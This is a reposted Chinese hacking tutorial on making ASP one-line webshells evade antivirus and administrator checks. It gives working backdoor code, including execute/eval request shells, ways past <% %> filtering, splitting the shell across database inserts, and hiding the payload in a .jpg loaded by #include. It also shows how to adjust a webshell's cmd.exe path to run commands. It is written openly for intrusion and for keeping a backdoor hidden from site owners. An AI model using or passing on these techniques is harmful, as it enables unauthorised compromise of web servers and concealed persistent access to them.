一句话木马的免杀(转)
在入侵過程中,我們常常會遇到這樣的問題,因為大馬太大,而不能上傳,怎么辦,這個時候就只能用小馬來輔助,但是,小馬的語句又被殺,今天我們來說說一句話小馬的免殺方法。
眾所周之,一句話的語句是<%execute request("密碼")%>
1.入侵過程中<%,%>符號被過濾怎么辦?我們可以想辦法避開<%,%>
<scriptlanguage=VBScript runat=server>execute request("cmd")</Script>
2.網絡中流傳的最小的木馬代碼是<%eval request("#")%> 如過連這也寫不下怎么辦?將木馬分開寫就好了!
<%Y=request("x")%> <%execute(Y)%>
這樣分開寫提交到數據庫就沒問題了!
不過,在ACCESS數據庫中新增加的數據物理位置是在舊數據之前的,所以要先寫<%execute(Y)%>部分。寫好后在客戶端寫密碼時除了填寫"x"以外的任何字符都可以,如果填了"x"就會出錯!
3.插入一句話容易爆錯,例如
Sub unlockPost()
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) or id="" Then
寫成
Sub unlockPost(<%eval request("#")%>)
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) or id="" Then
就可以了,也可以寫成帶容錯語句的格式!!
<%if request("cmd")<>""then execute request("cmd")%>
4.一句話木馬到兩句話木馬的轉型!
一句話木馬服務端原型:<%execute request("value")%> ,
變形后:<%On Error Resume Next execute request("value")%> ,
至于為什么要用兩句話木馬呢,是由于使我們的后門更加隱蔽。
我也試過用一句話插入WellShell的某個ASP文件里面,可是訪問時經常出錯,而插入兩句話木馬服務端卻可以正常訪問了,對站點的頁面無任何影響。
這樣就達到了隱蔽性更強的目的了,他管理員總不會連自己的網頁文件都刪了吧。
現在我的WellShell都有這樣的后門.選擇要插入兩句話木馬的ASP文件要注意,選一些可以用IE訪問的ASP文件,不要選conn.asp這樣的文件來插入。當然,連接兩句話木馬的客戶端仍然是用一句木馬的客戶端,不用修改。
5.一句話免殺:
一:變形法
比如:eval(request("#"))這樣的馬兒呢,一般情況下是不被殺的。但實際上,經常殺毒軟件會把eval(request列為特征碼。所以我們變形一下
E=request("id")
eval(E)
這樣可達到免殺的目的。
例如:<%execute request("1")%>變形后:
<%E=request("1")
execute E%>
當然,這種變形是最好做的。
介紹第二種方法:因為很多管理員很聰明,它會檢查ASP文件中的execute和eval函數。所以呢,不管你怎么反編譯,它最終總是要用其中的一個函數 來解釋運行,所以還是被發現了。好么,我們用外部文件來調用。建一個a.jpg或者任何不被發現的文件后綴或文件名。寫入 execute(request("#"))當然,你可以先變形后現放上去。然后在ASP文件中插入
<!--#include file="a.jpg" -->
來引用它,即可。
不過,管理員可以通過對比文件的方式找到修改過的文件,不過這種情況不多
6.在WEBSHELL中使用命令提示
在 使用ASP站長助手6.0時點擊命令提示符顯示“沒有權限”的時候,可以使用ASP站長助手上傳CMD.exe到你的WEBSHELL目錄(其它目錄也 行,把上傳以后的CMD.exe絕對路徑COPY出來),再修改你的WEBSHELL找到調用CMD.EXE的代碼。原來的代碼如下
.exec("cmd.exe /c "&DefCmd).stdout.readall
修改為
.exec("你想上傳的cmd.exe絕對路徑" /c"&DefCmd).stdout.readall
比如你上傳到的目錄是D:\web\www\cmd.exe,那么就修改成
.exec("D:\web\www\cmd.exe /c"&DefCmd).stdout.readall
@####################################################
我是一個不被神眷の男人~
####################################################@
總結
以上是生活随笔為你收集整理的一句话木马的免杀(转)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: excel表格数据怎么排序 excel表
- 下一篇: 主板报警声音大全